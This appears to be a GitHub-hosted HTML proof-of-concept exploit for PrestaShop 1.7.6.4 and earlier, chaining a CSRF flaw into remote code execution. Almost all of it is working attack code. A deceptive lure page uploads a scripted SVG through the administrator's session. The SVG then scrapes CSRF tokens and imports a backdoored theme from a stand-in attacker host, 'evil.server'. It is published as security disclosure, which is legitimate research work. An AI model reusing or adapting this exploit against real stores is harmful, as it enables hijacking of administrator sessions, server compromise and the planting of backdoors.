-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathSA20200411_prestashop_csrf_to_rce.html
114 lines (104 loc) · 4.64 KB
/
SA20200411_prestashop_csrf_to_rce.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
<html>
<!--
Prestashop <= 1.7.6.4 single-click RCE exploit
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
For more details, visit https://stazot.com
Change the values of the 3 variables marked as "change this"
-->
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<h3>This is totally a legit page. Just keep reading this for a minute :)</h3>
<script>history.pushState('', '', '/')</script>
<script>
var target = "http://localhost"; //change this
var admin_url = "/admin123ab45cd"; //change this
var theme_url = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip file
var xhr0 = new XMLHttpRequest();
xhr0.open("GET", target+admin_url+"/filemanager/dialog.php");
xhr0.withCredentials = true;
xhr0.send();
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", target+admin_url+"/filemanager/upload.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
xhr.withCredentials = true;
var body = "-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"exploit.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\x3e\r\n" +
"\r\n" +
"\t\x3cscript xlink:href=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js\"\x3e\x3c/script\x3e\r\n" +
"\t\r\n" +
"\t\x3cscript\x3e\r\n" +
"\t\r\n" +
"\t$.ajaxSetup({async: false});\r\n" +
"\r\n" +
"\tvar target = \'" + target + "\';\r\n" +
"\tvar admin_url = \'" + admin_url + "\';\r\n" +
"\tvar theme_url = \'" + theme_url + "\';\r\n" +
"\tvar import_url = \'\';\r\n" +
"\tvar import_token = \'\';\r\n" +
"\t\r\n" +
"\t$.get(target+admin_url+\'/index.php/improve/design/themes/import\', function( my_var0 ) {\r\n" +
"\t\r\n" +
"\t\tvar tmp = my_var0.match(/_token(.{44})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\"=\");\r\n" +
"\t\ttmp = tmp[1];\r\n" +
"\t\timport_url = target+admin_url+\'/improve/design/themes/import?_token=\'+tmp;\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\t$.get(import_url, function( my_var1 ) {\r\n" +
"\r\n" +
"\t\tvar tmp = my_var1.match(/import_theme__token(.{101})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\' \');\r\n" +
"\t\ttmp = tmp[3].toString().split(\'=\\\"\');\r\n" +
"\t\timport_token = tmp[1];\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\tvar themeUploadData = new FormData();\r\n" +
"\tthemeUploadData.append(\'import_theme[import_from_web]\', theme_url);\r\n" +
"\tthemeUploadData.append(\'import_theme[_token]\', import_token);\r\n" +
"\r\n" +
"\t$.ajax({\r\n" +
"\t\turl: import_url,\r\n" +
"\t\tdata: themeUploadData,\r\n" +
"\t\tcache: false,\r\n" +
"\t\tcontentType: false,\r\n" +
"\t\tprocessData: false,\r\n" +
"\t\tmethod: \'POST\'\r\n" +
"\t});\r\n" +
"\r\n" +
"\t\x3c/script\x3e\r\n" +
"\r\n" +
"\x3c/svg\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.setTimeout(function(){
submitRequest();
}, 1500);
window.setTimeout(function(){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = target+"/img/cms/exploit.svg";
document.body.appendChild(iframe);
}, 4000);
</script>
</body>
</html>